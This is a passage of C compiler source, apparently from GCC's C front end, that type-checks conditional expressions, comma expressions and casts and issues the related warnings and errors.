else if (C_DECL_REGISTER (x))
{
if (TREE_PUBLIC (x) || is_global_var (x))
error ("address of global register variable %qD requested", x);
else
error ("address of register variable %qD requested", x);
return false;
}
/* FALLTHRU */
case FUNCTION_DECL:
TREE_ADDRESSABLE (x) = 1;
/* FALLTHRU */
default:
return true;
}
}
/* Convert EXPR to TYPE, warning about conversion problems with
constants. SEMANTIC_TYPE is the type this conversion would use
without excess precision. If SEMANTIC_TYPE is NULL, this function
is equivalent to convert_and_check. This function is a wrapper that
handles conversions that may be different than
the usual ones because of excess precision. */
static tree
ep_convert_and_check (location_t loc, tree type, tree expr,
tree semantic_type)
{
if (TREE_TYPE (expr) == type)
return expr;
/* For C11, integer conversions may have results with excess
precision. */
if (flag_isoc11 || !semantic_type)
return convert_and_check (loc, type, expr);
if (TREE_CODE (TREE_TYPE (expr)) == INTEGER_TYPE
&& TREE_TYPE (expr) != semantic_type)
{
/* For integers, we need to check the real conversion, not
the conversion to the excess precision type. */
expr = convert_and_check (loc, semantic_type, expr);
}
/* Result type is the excess precision type, which should be
large enough, so do not check. */
return convert (type, expr);
}
/* If EXPR refers to a built-in declared without a prototype returns
the actual type of the built-in and, if non-null, set *BLTIN to
a pointer to the built-in. Otherwise return the type of EXPR
and clear *BLTIN if non-null. */
static tree
type_or_builtin_type (tree expr, tree *bltin = NULL)
{
tree dummy;
if (!bltin)
bltin = &dummy;
*bltin = NULL_TREE;
tree type = TREE_TYPE (expr);
if (TREE_CODE (expr) != ADDR_EXPR)
return type;
tree oper = TREE_OPERAND (expr, 0);
if (!DECL_P (oper)
|| TREE_CODE (oper) != FUNCTION_DECL
|| !fndecl_built_in_p (oper, BUILT_IN_NORMAL))
return type;
built_in_function code = DECL_FUNCTION_CODE (oper);
if (!C_DECL_BUILTIN_PROTOTYPE (oper))
return type;
if ((*bltin = builtin_decl_implicit (code)))
type = build_pointer_type (TREE_TYPE (*bltin));
return type;
}
/* Build and return a conditional expression IFEXP ? OP1 : OP2. If
IFEXP_BCP then the condition is a call to __builtin_constant_p, and
if folded to an integer constant then the unselected half may
contain arbitrary operations not normally permitted in constant
expressions. Set the location of the expression to LOC. */
tree
build_conditional_expr (location_t colon_loc, tree ifexp, bool ifexp_bcp,
tree op1, tree op1_original_type, location_t op1_loc,
tree op2, tree op2_original_type, location_t op2_loc)
{
tree type1;
tree type2;
enum tree_code code1;
enum tree_code code2;
tree result_type = NULL;
tree semantic_result_type = NULL;
tree orig_op1 = op1, orig_op2 = op2;
bool int_const, op1_int_operands, op2_int_operands, int_operands;
bool ifexp_int_operands;
tree ret;
op1_int_operands = EXPR_INT_CONST_OPERANDS (orig_op1);
if (op1_int_operands)
op1 = remove_c_maybe_const_expr (op1);
op2_int_operands = EXPR_INT_CONST_OPERANDS (orig_op2);
if (op2_int_operands)
op2 = remove_c_maybe_const_expr (op2);
ifexp_int_operands = EXPR_INT_CONST_OPERANDS (ifexp);
if (ifexp_int_operands)
ifexp = remove_c_maybe_const_expr (ifexp);
/* Promote both alternatives. */
if (TREE_CODE (TREE_TYPE (op1)) != VOID_TYPE)
op1 = default_conversion (op1);
if (TREE_CODE (TREE_TYPE (op2)) != VOID_TYPE)
op2 = default_conversion (op2);
if (TREE_CODE (ifexp) == ERROR_MARK
|| TREE_CODE (TREE_TYPE (op1)) == ERROR_MARK
|| TREE_CODE (TREE_TYPE (op2)) == ERROR_MARK)
return error_mark_node;
tree bltin1 = NULL_TREE;
tree bltin2 = NULL_TREE;
type1 = type_or_builtin_type (op1, &bltin1);
code1 = TREE_CODE (type1);
type2 = type_or_builtin_type (op2, &bltin2);
code2 = TREE_CODE (type2);
if (code1 == POINTER_TYPE && reject_gcc_builtin (op1))
return error_mark_node;
if (code2 == POINTER_TYPE && reject_gcc_builtin (op2))
return error_mark_node;
/* C90 does not permit non-lvalue arrays in conditional expressions.
In C99 they will be pointers by now. */
if (code1 == ARRAY_TYPE || code2 == ARRAY_TYPE)
{
error_at (colon_loc, "non-lvalue array in conditional expression");
return error_mark_node;
}
if ((TREE_CODE (op1) == EXCESS_PRECISION_EXPR
|| TREE_CODE (op2) == EXCESS_PRECISION_EXPR)
&& (code1 == INTEGER_TYPE || code1 == REAL_TYPE
|| code1 == COMPLEX_TYPE)
&& (code2 == INTEGER_TYPE || code2 == REAL_TYPE
|| code2 == COMPLEX_TYPE))
{
semantic_result_type = c_common_type (type1, type2);
if (TREE_CODE (op1) == EXCESS_PRECISION_EXPR)
{
op1 = TREE_OPERAND (op1, 0);
type1 = TREE_TYPE (op1);
gcc_assert (TREE_CODE (type1) == code1);
}
if (TREE_CODE (op2) == EXCESS_PRECISION_EXPR)
{
op2 = TREE_OPERAND (op2, 0);
type2 = TREE_TYPE (op2);
gcc_assert (TREE_CODE (type2) == code2);
}
}
if (warn_cxx_compat)
{
tree t1 = op1_original_type ? op1_original_type : TREE_TYPE (orig_op1);
tree t2 = op2_original_type ? op2_original_type : TREE_TYPE (orig_op2);
if (TREE_CODE (t1) == ENUMERAL_TYPE
&& TREE_CODE (t2) == ENUMERAL_TYPE
&& TYPE_MAIN_VARIANT (t1) != TYPE_MAIN_VARIANT (t2))
warning_at (colon_loc, OPT_Wc___compat,
("different enum types in conditional is "
"invalid in C++: %qT vs %qT"),
t1, t2);
}
/* Quickly detect the usual case where op1 and op2 have the same type
after promotion. */
if (TYPE_MAIN_VARIANT (type1) == TYPE_MAIN_VARIANT (type2))
{
if (type1 == type2)
result_type = type1;
else
result_type = TYPE_MAIN_VARIANT (type1);
}
else if ((code1 == INTEGER_TYPE || code1 == REAL_TYPE
|| code1 == COMPLEX_TYPE)
&& (code2 == INTEGER_TYPE || code2 == REAL_TYPE
|| code2 == COMPLEX_TYPE))
{
/* In C11, a conditional expression between a floating-point
type and an integer type should convert the integer type to
the evaluation format of the floating-point type, with
possible excess precision. */
tree eptype1 = type1;
tree eptype2 = type2;
if (flag_isoc11)
{
tree eptype;
if (ANY_INTEGRAL_TYPE_P (type1)
&& (eptype = excess_precision_type (type2)) != NULL_TREE)
{
eptype2 = eptype;
if (!semantic_result_type)
semantic_result_type = c_common_type (type1, type2);
}
else if (ANY_INTEGRAL_TYPE_P (type2)
&& (eptype = excess_precision_type (type1)) != NULL_TREE)
{
eptype1 = eptype;
if (!semantic_result_type)
semantic_result_type = c_common_type (type1, type2);
}
}
result_type = c_common_type (eptype1, eptype2);
if (result_type == error_mark_node)
return error_mark_node;
do_warn_double_promotion (result_type, type1, type2,
"implicit conversion from %qT to %qT to "
"match other result of conditional",
colon_loc);
/* If -Wsign-compare, warn here if type1 and type2 have
different signedness. We'll promote the signed to unsigned
and later code won't know it used to be different.
Do this check on the original types, so that explicit casts
will be considered, but default promotions won't. */
if (c_inhibit_evaluation_warnings == 0)
{
int unsigned_op1 = TYPE_UNSIGNED (TREE_TYPE (orig_op1));
int unsigned_op2 = TYPE_UNSIGNED (TREE_TYPE (orig_op2));
if (unsigned_op1 ^ unsigned_op2)
{
bool ovf;
/* Do not warn if the result type is signed, since the
signed type will only be chosen if it can represent
all the values of the unsigned type. */
if (!TYPE_UNSIGNED (result_type))
/* OK */;
else
{
bool op1_maybe_const = true;
bool op2_maybe_const = true;
/* Do not warn if the signed quantity is an
unsuffixed integer literal (or some static
constant expression involving such literals) and
it is non-negative. This warning requires the
operands to be folded for best results, so do
that folding in this case even without
warn_sign_compare to avoid warning options
possibly affecting code generation. */
c_inhibit_evaluation_warnings
+= (ifexp == truthvalue_false_node);
op1 = c_fully_fold (op1, require_constant_value,
&op1_maybe_const);
c_inhibit_evaluation_warnings
-= (ifexp == truthvalue_false_node);
c_inhibit_evaluation_warnings
+= (ifexp == truthvalue_true_node);
op2 = c_fully_fold (op2, require_constant_value,
&op2_maybe_const);
c_inhibit_evaluation_warnings
-= (ifexp == truthvalue_true_node);
if (warn_sign_compare)
{
if ((unsigned_op2
&& tree_expr_nonnegative_warnv_p (op1, &ovf))
|| (unsigned_op1
&& tree_expr_nonnegative_warnv_p (op2, &ovf)))
/* OK */;
else if (unsigned_op2)
warning_at (op1_loc, OPT_Wsign_compare,
"operand of %<?:%> changes signedness from "
"%qT to %qT due to unsignedness of other "
"operand", TREE_TYPE (orig_op1),
TREE_TYPE (orig_op2));
else
warning_at (op2_loc, OPT_Wsign_compare,
"operand of %<?:%> changes signedness from "
"%qT to %qT due to unsignedness of other "
"operand", TREE_TYPE (orig_op2),
TREE_TYPE (orig_op1));
}
if (!op1_maybe_const || TREE_CODE (op1) != INTEGER_CST)
op1 = c_wrap_maybe_const (op1, !op1_maybe_const);
if (!op2_maybe_const || TREE_CODE (op2) != INTEGER_CST)
op2 = c_wrap_maybe_const (op2, !op2_maybe_const);
}
}
}
}
else if (code1 == VOID_TYPE || code2 == VOID_TYPE)
{
if (code1 != VOID_TYPE || code2 != VOID_TYPE)
pedwarn (colon_loc, OPT_Wpedantic,
"ISO C forbids conditional expr with only one void side");
result_type = void_type_node;
}
else if (code1 == POINTER_TYPE && code2 == POINTER_TYPE)
{
addr_space_t as1 = TYPE_ADDR_SPACE (TREE_TYPE (type1));
addr_space_t as2 = TYPE_ADDR_SPACE (TREE_TYPE (type2));
addr_space_t as_common;
if (comp_target_types (colon_loc, type1, type2))
result_type = common_pointer_type (type1, type2);
else if (null_pointer_constant_p (orig_op1))
result_type = type2;
else if (null_pointer_constant_p (orig_op2))
result_type = type1;
else if (!addr_space_superset (as1, as2, &as_common))
{
error_at (colon_loc, "pointers to disjoint address spaces "
"used in conditional expression");
return error_mark_node;
}
else if (VOID_TYPE_P (TREE_TYPE (type1))
&& !TYPE_ATOMIC (TREE_TYPE (type1)))
{
if ((TREE_CODE (TREE_TYPE (type2)) == ARRAY_TYPE)
&& (TYPE_QUALS (strip_array_types (TREE_TYPE (type2)))
& ~TYPE_QUALS (TREE_TYPE (type1))))
warning_at (colon_loc, OPT_Wdiscarded_array_qualifiers,
"pointer to array loses qualifier "
"in conditional expression");
if (TREE_CODE (TREE_TYPE (type2)) == FUNCTION_TYPE)
pedwarn (colon_loc, OPT_Wpedantic,
"ISO C forbids conditional expr between "
"%<void *%> and function pointer");
result_type = build_pointer_type (qualify_type (TREE_TYPE (type1),
TREE_TYPE (type2)));
}
else if (VOID_TYPE_P (TREE_TYPE (type2))
&& !TYPE_ATOMIC (TREE_TYPE (type2)))
{
if ((TREE_CODE (TREE_TYPE (type1)) == ARRAY_TYPE)
&& (TYPE_QUALS (strip_array_types (TREE_TYPE (type1)))
& ~TYPE_QUALS (TREE_TYPE (type2))))
warning_at (colon_loc, OPT_Wdiscarded_array_qualifiers,
"pointer to array loses qualifier "
"in conditional expression");
if (TREE_CODE (TREE_TYPE (type1)) == FUNCTION_TYPE)
pedwarn (colon_loc, OPT_Wpedantic,
"ISO C forbids conditional expr between "
"%<void *%> and function pointer");
result_type = build_pointer_type (qualify_type (TREE_TYPE (type2),
TREE_TYPE (type1)));
}
/* Objective-C pointer comparisons are a bit more lenient. */
else if (objc_have_common_type (type1, type2, -3, NULL_TREE))
result_type = objc_common_type (type1, type2);
else
{
int qual = ENCODE_QUAL_ADDR_SPACE (as_common);
if (bltin1 && bltin2)
warning_at (colon_loc, OPT_Wincompatible_pointer_types,
"pointer type mismatch between %qT and %qT "
"of %qD and %qD in conditional expression",
type1, type2, bltin1, bltin2);
else
pedwarn (colon_loc, 0,
"pointer type mismatch in conditional expression");
result_type = build_pointer_type
(build_qualified_type (void_type_node, qual));
}
}
else if (code1 == POINTER_TYPE && code2 == INTEGER_TYPE)
{
if (!null_pointer_constant_p (orig_op2))
pedwarn (colon_loc, 0,
"pointer/integer type mismatch in conditional expression");
else
{
op2 = null_pointer_node;
}
result_type = type1;
}
else if (code2 == POINTER_TYPE && code1 == INTEGER_TYPE)
{
if (!null_pointer_constant_p (orig_op1))
pedwarn (colon_loc, 0,
"pointer/integer type mismatch in conditional expression");
else
{
op1 = null_pointer_node;
}
result_type = type2;
}
if (!result_type)
{
if (flag_cond_mismatch)
result_type = void_type_node;
else
{
error_at (colon_loc, "type mismatch in conditional expression");
return error_mark_node;
}
}
/* Merge const and volatile flags of the incoming types. */
result_type
= build_type_variant (result_type,
TYPE_READONLY (type1) || TYPE_READONLY (type2),
TYPE_VOLATILE (type1) || TYPE_VOLATILE (type2));
op1 = ep_convert_and_check (colon_loc, result_type, op1,
semantic_result_type);
op2 = ep_convert_and_check (colon_loc, result_type, op2,
semantic_result_type);
if (ifexp_bcp && ifexp == truthvalue_true_node)
{
op2_int_operands = true;
op1 = c_fully_fold (op1, require_constant_value, NULL);
}
if (ifexp_bcp && ifexp == truthvalue_false_node)
{
op1_int_operands = true;
op2 = c_fully_fold (op2, require_constant_value, NULL);
}
int_const = int_operands = (ifexp_int_operands
&& op1_int_operands
&& op2_int_operands);
if (int_operands)
{
int_const = ((ifexp == truthvalue_true_node
&& TREE_CODE (orig_op1) == INTEGER_CST
&& !TREE_OVERFLOW (orig_op1))
|| (ifexp == truthvalue_false_node
&& TREE_CODE (orig_op2) == INTEGER_CST
&& !TREE_OVERFLOW (orig_op2)));
}
/* Need to convert condition operand into a vector mask. */
if (VECTOR_TYPE_P (TREE_TYPE (ifexp)))
{
tree vectype = TREE_TYPE (ifexp);
tree elem_type = TREE_TYPE (vectype);
tree zero = build_int_cst (elem_type, 0);
tree zero_vec = build_vector_from_val (vectype, zero);
tree cmp_type = truth_type_for (vectype);
ifexp = build2 (NE_EXPR, cmp_type, ifexp, zero_vec);
}
if (int_const || (ifexp_bcp && TREE_CODE (ifexp) == INTEGER_CST))
ret = fold_build3_loc (colon_loc, COND_EXPR, result_type, ifexp, op1, op2);
else
{
if (int_operands)
{
/* Use c_fully_fold here, since C_MAYBE_CONST_EXPR might be
nested inside of the expression. */
op1 = c_fully_fold (op1, false, NULL);
op2 = c_fully_fold (op2, false, NULL);
}
ret = build3 (COND_EXPR, result_type, ifexp, op1, op2);
if (int_operands)
ret = note_integer_operands (ret);
}
if (semantic_result_type)
ret = build1 (EXCESS_PRECISION_EXPR, semantic_result_type, ret);
protected_set_expr_location (ret, colon_loc);
/* If the OP1 and OP2 are the same and don't have side-effects,
warn here, because the COND_EXPR will be turned into OP1. */
if (warn_duplicated_branches
&& TREE_CODE (ret) == COND_EXPR
&& (op1 == op2 || operand_equal_p (op1, op2, 0)))
warning_at (EXPR_LOCATION (ret), OPT_Wduplicated_branches,
"this condition has identical branches");
return ret;
}
/* Return a compound expression that performs two expressions and
returns the value of the second of them.
LOC is the location of the COMPOUND_EXPR. */
tree
build_compound_expr (location_t loc, tree expr1, tree expr2)
{
bool expr1_int_operands, expr2_int_operands;
tree eptype = NULL_TREE;
tree ret;
expr1_int_operands = EXPR_INT_CONST_OPERANDS (expr1);
if (expr1_int_operands)
expr1 = remove_c_maybe_const_expr (expr1);
expr2_int_operands = EXPR_INT_CONST_OPERANDS (expr2);
if (expr2_int_operands)
expr2 = remove_c_maybe_const_expr (expr2);
if (TREE_CODE (expr1) == EXCESS_PRECISION_EXPR)
expr1 = TREE_OPERAND (expr1, 0);
if (TREE_CODE (expr2) == EXCESS_PRECISION_EXPR)
{
eptype = TREE_TYPE (expr2);
expr2 = TREE_OPERAND (expr2, 0);
}
if (!TREE_SIDE_EFFECTS (expr1))
{
/* The left-hand operand of a comma expression is like an expression
statement: with -Wunused, we should warn if it doesn't have
any side-effects, unless it was explicitly cast to (void). */
if (warn_unused_value)
{
if (VOID_TYPE_P (TREE_TYPE (expr1))
&& CONVERT_EXPR_P (expr1))
; /* (void) a, b */
else if (VOID_TYPE_P (TREE_TYPE (expr1))
&& TREE_CODE (expr1) == COMPOUND_EXPR
&& CONVERT_EXPR_P (TREE_OPERAND (expr1, 1)))
; /* (void) a, (void) b, c */
else
warning_at (loc, OPT_Wunused_value,
"left-hand operand of comma expression has no effect");
}
}
else if (TREE_CODE (expr1) == COMPOUND_EXPR
&& warn_unused_value)
{
tree r = expr1;
location_t cloc = loc;
while (TREE_CODE (r) == COMPOUND_EXPR)
{
if (EXPR_HAS_LOCATION (r))
cloc = EXPR_LOCATION (r);
r = TREE_OPERAND (r, 1);
}
if (!TREE_SIDE_EFFECTS (r)
&& !VOID_TYPE_P (TREE_TYPE (r))
&& !CONVERT_EXPR_P (r))
warning_at (cloc, OPT_Wunused_value,
"right-hand operand of comma expression has no effect");
}
/* With -Wunused, we should also warn if the left-hand operand does have
side-effects, but computes a value which is not used. For example, in
`foo() + bar(), baz()' the result of the `+' operator is not used,
so we should issue a warning. */
else if (warn_unused_value)
warn_if_unused_value (expr1, loc);
if (expr2 == error_mark_node)
return error_mark_node;
ret = build2 (COMPOUND_EXPR, TREE_TYPE (expr2), expr1, expr2);
if (flag_isoc99
&& expr1_int_operands
&& expr2_int_operands)
ret = note_integer_operands (ret);
if (eptype)
ret = build1 (EXCESS_PRECISION_EXPR, eptype, ret);
protected_set_expr_location (ret, loc);
return ret;
}
/* Issue -Wcast-qual warnings when appropriate. TYPE is the type to
which we are casting. OTYPE is the type of the expression being
cast. Both TYPE and OTYPE are pointer types. LOC is the location
of the cast. -Wcast-qual appeared on the command line. Named
address space qualifiers are not handled here, because they result
in different warnings. */
static void
handle_warn_cast_qual (location_t loc, tree type, tree otype)
{
tree in_type = type;
tree in_otype = otype;
int added = 0;
int discarded = 0;
bool is_const;
/* Check that the qualifiers on IN_TYPE are a superset of the
qualifiers of IN_OTYPE. The outermost level of POINTER_TYPE
nodes is uninteresting and we stop as soon as we hit a
non-POINTER_TYPE node on either type. */
do
{
in_otype = TREE_TYPE (in_otype);
in_type = TREE_TYPE (in_type);
/* GNU C allows cv-qualified function types. 'const' means the
function is very pure, 'volatile' means it can't return. We
need to warn when such qualifiers are added, not when they're
taken away. */
if (TREE_CODE (in_otype) == FUNCTION_TYPE
&& TREE_CODE (in_type) == FUNCTION_TYPE)
added |= (TYPE_QUALS_NO_ADDR_SPACE (in_type)
& ~TYPE_QUALS_NO_ADDR_SPACE (in_otype));
else
discarded |= (TYPE_QUALS_NO_ADDR_SPACE (in_otype)
& ~TYPE_QUALS_NO_ADDR_SPACE (in_type));
}
while (TREE_CODE (in_type) == POINTER_TYPE
&& TREE_CODE (in_otype) == POINTER_TYPE);
if (added)
warning_at (loc, OPT_Wcast_qual,
"cast adds %q#v qualifier to function type", added);
if (discarded)
/* There are qualifiers present in IN_OTYPE that are not present
in IN_TYPE. */
warning_at (loc, OPT_Wcast_qual,
"cast discards %qv qualifier from pointer target type",
discarded);
if (added || discarded)
return;
/* A cast from **T to const **T is unsafe, because it can cause a
const value to be changed with no additional warning. We only
issue this warning if T is the same on both sides, and we only
issue the warning if there are the same number of pointers on
both sides, as otherwise the cast is clearly unsafe anyhow. A
cast is unsafe when a qualifier is added at one level and const
is not present at all outer levels.
To issue this warning, we check at each level whether the cast
adds new qualifiers not already seen. We don't need to special
case function types, as they won't have the same
TYPE_MAIN_VARIANT. */
if (TYPE_MAIN_VARIANT (in_type) != TYPE_MAIN_VARIANT (in_otype))
return;
if (TREE_CODE (TREE_TYPE (type)) != POINTER_TYPE)
return;
in_type = type;
in_otype = otype;
is_const = TYPE_READONLY (TREE_TYPE (in_type));
do
{
in_type = TREE_TYPE (in_type);
in_otype = TREE_TYPE (in_otype);
if ((TYPE_QUALS (in_type) &~ TYPE_QUALS (in_otype)) != 0
&& !is_const)
{
warning_at (loc, OPT_Wcast_qual,
"to be safe all intermediate pointers in cast from "
"%qT to %qT must be %<const%> qualified",
otype, type);
break;
}
if (is_const)
is_const = TYPE_READONLY (in_type);
}
while (TREE_CODE (in_type) == POINTER_TYPE);
}
/* Heuristic check if two parameter types can be considered ABI-equivalent. */
static bool
c_safe_arg_type_equiv_p (tree t1, tree t2)
{
t1 = TYPE_MAIN_VARIANT (t1);
t2 = TYPE_MAIN_VARIANT (t2);
if (TREE_CODE (t1) == POINTER_TYPE
&& TREE_CODE (t2) == POINTER_TYPE)
return true;
/* The signedness of the parameter matters only when an integral
type smaller than int is promoted to int, otherwise only the
precision of the parameter matters.
This check should make sure that the callee does not see
undefined values in argument registers. */
if (INTEGRAL_TYPE_P (t1)
&& INTEGRAL_TYPE_P (t2)
&& TYPE_PRECISION (t1) == TYPE_PRECISION (t2)
&& (TYPE_UNSIGNED (t1) == TYPE_UNSIGNED (t2)
|| !targetm.calls.promote_prototypes (NULL_TREE)
|| TYPE_PRECISION (t1) >= TYPE_PRECISION (integer_type_node)))
return true;
return comptypes (t1, t2);
}
/* Check if a type cast between two function types can be considered safe. */
static bool
c_safe_function_type_cast_p (tree t1, tree t2)
{
if (TREE_TYPE (t1) == void_type_node &&
TYPE_ARG_TYPES (t1) == void_list_node)
return true;
if (TREE_TYPE (t2) == void_type_node &&
TYPE_ARG_TYPES (t2) == void_list_node)
return true;
if (!c_safe_arg_type_equiv_p (TREE_TYPE (t1), TREE_TYPE (t2)))
return false;
for (t1 = TYPE_ARG_TYPES (t1), t2 = TYPE_ARG_TYPES (t2);
t1 && t2;
t1 = TREE_CHAIN (t1), t2 = TREE_CHAIN (t2))
if (!c_safe_arg_type_equiv_p (TREE_VALUE (t1), TREE_VALUE (t2)))
return false;
return true;
}
/* Build an expression representing a cast to type TYPE of expression EXPR.
LOC is the location of the cast-- typically the open paren of the cast. */
tree
build_c_cast (location_t loc, tree type, tree expr)
{
tree value;
bool int_operands = EXPR_INT_CONST_OPERANDS (expr);
if (TREE_CODE (expr) == EXCESS_PRECISION_EXPR)
expr = TREE_OPERAND (expr, 0);
value = expr;
if (int_operands)
value = remove_c_maybe_const_expr (value);
if (type == error_mark_node || expr == error_mark_node)
return error_mark_node;
/* The ObjC front-end uses TYPE_MAIN_VARIANT to tie together types differing
only in <protocol> qualifications. But when constructing cast expressions,
the protocols do matter and must be kept around. */
if (objc_is_object_ptr (type) && objc_is_object_ptr (TREE_TYPE (expr)))
return build1 (NOP_EXPR, type, expr);
type = TYPE_MAIN_VARIANT (type);
if (TREE_CODE (type) == ARRAY_TYPE)
{
error_at (loc, "cast specifies array type");
return error_mark_node;
}
if (TREE_CODE (type) == FUNCTION_TYPE)
{
error_at (loc, "cast specifies function type");
return error_mark_node;
}
if (!VOID_TYPE_P (type))
{
value = require_complete_type (loc, value);
if (value == error_mark_node)
return error_mark_node;
}
if (type == TYPE_MAIN_VARIANT (TREE_TYPE (value)))
{
if (RECORD_OR_UNION_TYPE_P (type))
pedwarn (loc, OPT_Wpedantic,
"ISO C forbids casting nonscalar to the same type");
/* Convert to remove any qualifiers from VALUE's type. */
value = convert (type, value);
}
else if (TREE_CODE (type) == UNION_TYPE)
{
tree field;
for (field = TYPE_FIELDS (type); field; field = DECL_CHAIN (field))
if (TREE_TYPE (field) != error_mark_node
&& comptypes (TYPE_MAIN_VARIANT (TREE_TYPE (field)),
TYPE_MAIN_VARIANT (TREE_TYPE (value))))
break;
if (field)
{
tree t;
bool maybe_const = true;
pedwarn (loc, OPT_Wpedantic, "ISO C forbids casts to union type");
t = c_fully_fold (value, false, &maybe_const);
t = build_constructor_single (type, field, t);
if (!maybe_const)
t = c_wrap_maybe_const (t, true);
t = digest_init (loc, type, t,
NULL_TREE, false, true, 0);
TREE_CONSTANT (t) = TREE_CONSTANT (value);
return t;
}
error_at (loc, "cast to union type from type not present in union");
return error_mark_node;
}
else
{
tree otype, ovalue;
if (type == void_type_node)
{
tree t = build1 (CONVERT_EXPR, type, value);
SET_EXPR_LOCATION (t, loc);
return t;
}
otype = TREE_TYPE (value);
/* Optionally warn about potentially worrisome casts. */
if (warn_cast_qual
&& TREE_CODE (type) == POINTER_TYPE
&& TREE_CODE (otype) == POINTER_TYPE)
handle_warn_cast_qual (loc, type, otype);
/* Warn about conversions between pointers to disjoint
address spaces. */
if (TREE_CODE (type) == POINTER_TYPE
&& TREE_CODE (otype) == POINTER_TYPE
&& !null_pointer_constant_p (value))
{
addr_space_t as_to = TYPE_ADDR_SPACE (TREE_TYPE (type));
addr_space_t as_from = TYPE_ADDR_SPACE (TREE_TYPE (otype));
addr_space_t as_common;
if (!addr_space_superset (as_to, as_from, &as_common))
{
if (ADDR_SPACE_GENERIC_P (as_from))
warning_at (loc, 0, "cast to %s address space pointer "
"from disjoint generic address space pointer",
c_addr_space_name (as_to));
else if (ADDR_SPACE_GENERIC_P (as_to))
warning_at (loc, 0, "cast to generic address space pointer "
"from disjoint %s address space pointer",
c_addr_space_name (as_from));
else
warning_at (loc, 0, "cast to %s address space pointer "
"from disjoint %s address space pointer",
c_addr_space_name (as_to),
c_addr_space_name (as_from));
}
}
/* Warn about possible alignment problems. */
if ((STRICT_ALIGNMENT || warn_cast_align == 2)
&& TREE_CODE (type) == POINTER_TYPE
&& TREE_CODE (otype) == POINTER_TYPE
&& TREE_CODE (TREE_TYPE (otype)) != VOID_TYPE
&& TREE_CODE (TREE_TYPE (otype)) != FUNCTION_TYPE
/* Don't warn about opaque types, where the actual alignment
restriction is unknown. */
&& !(RECORD_OR_UNION_TYPE_P (TREE_TYPE (otype))
&& TYPE_MODE (TREE_TYPE (otype)) == VOIDmode)
&& min_align_of_type (TREE_TYPE (type))
> min_align_of_type (TREE_TYPE (otype)))
warning_at (loc, OPT_Wcast_align,
"cast increases required alignment of target type");
if (TREE_CODE (type) == INTEGER_TYPE
&& TREE_CODE (otype) == POINTER_TYPE
&& TYPE_PRECISION (type) != TYPE_PRECISION (otype))
/* Unlike conversion of integers to pointers, where the
warning is disabled for converting constants because
of cases such as SIG_*, warn about converting constant
pointers to integers. In some cases it may cause unwanted
sign extension, and a warning is appropriate. */
warning_at (loc, OPT_Wpointer_to_int_cast,
"cast from pointer to integer of different size");
if (TREE_CODE (value) == CALL_EXPR
&& TREE_CODE (type) != TREE_CODE (otype))
warning_at (loc, OPT_Wbad_function_cast,
"cast from function call of type %qT "
"to non-matching type %qT", otype, type);
if (TREE_CODE (type) == POINTER_TYPE
&& TREE_CODE (otype) == INTEGER_TYPE
&& TYPE_PRECISION (type) != TYPE_PRECISION (otype)
/* Don't warn about converting any constant. */
&& !TREE_CONSTANT (value))
warning_at (loc,
OPT_Wint_to_pointer_cast, "cast to pointer from integer "
"of different size");
if (warn_strict_aliasing <= 2)
strict_aliasing_warning (EXPR_LOCATION (value), type, expr);
/* If pedantic, warn for conversions between function and object
pointer types, except for converting a null pointer constant
to function pointer type. */
if (pedantic
&& TREE_CODE (type) == POINTER_TYPE
&& TREE_CODE (otype) == POINTER_TYPE
&& TREE_CODE (TREE_TYPE (otype)) == FUNCTION_TYPE
&& TREE_CODE (TREE_TYPE (type)) != FUNCTION_TYPE)
pedwarn (loc, OPT_Wpedantic, "ISO C forbids "
"conversion of function pointer to object pointer type");
if (pedantic
&& TREE_CODE (type) == POINTER_TYPE
&& TREE_CODE (otype) == POINTER_TYPE
&& TREE_CODE (TREE_TYPE (type)) == FUNCTION_TYPE
&& TREE_CODE (TREE_TYPE (otype)) != FUNCTION_TYPE
&& !null_pointer_constant_p (value))
pedwarn (loc, OPT_Wpedantic, "ISO C forbids "
"conversion of object pointer to function pointer type");
if (TREE_CODE (type) == POINTER_TYPE
&& TREE_CODE (otype) == POINTER_TYPE
&& TREE_CODE (TREE_TYPE (type)) == FUNCTION_TYPE
&& TREE_CODE (TREE_TYPE (otype)) == FUNCTION_TYPE
&& !c_safe_function_type_cast_p (TREE_TYPE (type),
TREE_TYPE (otype)))
warning_at (loc, OPT_Wcast_function_type,
"cast between incompatible function types"
" from %qT to %qT", otype, type);
ovalue = value;
value = convert (type, value);
/* Ignore any integer overflow caused by the cast. */
if (TREE_CODE (value) == INTEGER_CST && !FLOAT_TYPE_P (otype))
{
if (CONSTANT_CLASS_P (ovalue) && TREE_OVERFLOW (ovalue))
{
if (!TREE_OVERFLOW (value))
{
/* Avoid clobbering a shared constant. */
value = copy_node (value);
TREE_OVERFLOW (value) = TREE_OVERFLOW (ovalue);
}
}
else if (TREE_OVERFLOW (value))
/* Reset VALUE's overflow flags, ensuring constant sharing. */
value = wide_int_to_tree (TREE_TYPE (value), wi::to_wide (value));
}
}
/* Don't let a cast be an lvalue. */
if (lvalue_p (value))
value = non_lvalue_loc (loc, value);
/* Don't allow the results of casting to floating-point or complex
types be confused with actual constants, or casts involving
integer and pointer types other than direct integer-to-integer
and integer-to-pointer be confused with integer constant
expressions and null pointer constants. */
if (TREE_CODE (value) == REAL_CST
|| TREE_CODE (value) == COMPLEX_CST
|| (TREE_CODE (value) == INTEGER_CST
&& !((TREE_CODE (expr) == INTEGER_CST
&& INTEGRAL_TYPE_P (TREE_TYPE (expr)))
|| TREE_CODE (expr) == REAL_CST
|| TREE_CODE (expr) == COMPLEX_CST)))
value = build1 (NOP_EXPR, type, value);
/* If the expression has integer operands and so can occur in an
unevaluated part of an integer constant expression, ensure the
return value reflects this. */
if (int_operands
&& INTEGRAL_TYPE_P (type)
&& !EXPR_INT_CONST_OPERANDS (value))
value = note_integer_operands (value);
protected_set_expr_location (value, loc);
return value;
}
/* Interpret a cast of expression EXPR to type TYPE. LOC is the
location of the open paren of the cast, or the position of the cast
expr. */
tree
c_cast_expr (location_t loc, struct c_type_name *type_name, tree expr)
{
tree type;
tree type_expr = NULL_TREE;
bool type_expr_const = true;
tree ret;
int saved_wsp = warn_strict_prototypes;
/* This avoids warnings about unprototyped casts on
integers. E.g. "#define SIG_DFL (void(*)())0". */
if (TREE_CODE (expr) == INTEGER_CST)
warn_strict_prototypes = 0;
type = groktypename (type_name, &type_expr, &type_expr_const);
warn_strict_prototypes = saved_wsp;
if (TREE_CODE (expr) == ADDR_EXPR && !VOID_TYPE_P (type)
&& reject_gcc_builtin (expr))
return error_mark_node;
ret = build_c_cast (loc, type, expr);
if (type_expr)
{
bool inner_expr_const = true;
ret = c_fully_fold (ret, require_constant_value, &inner_expr_const);
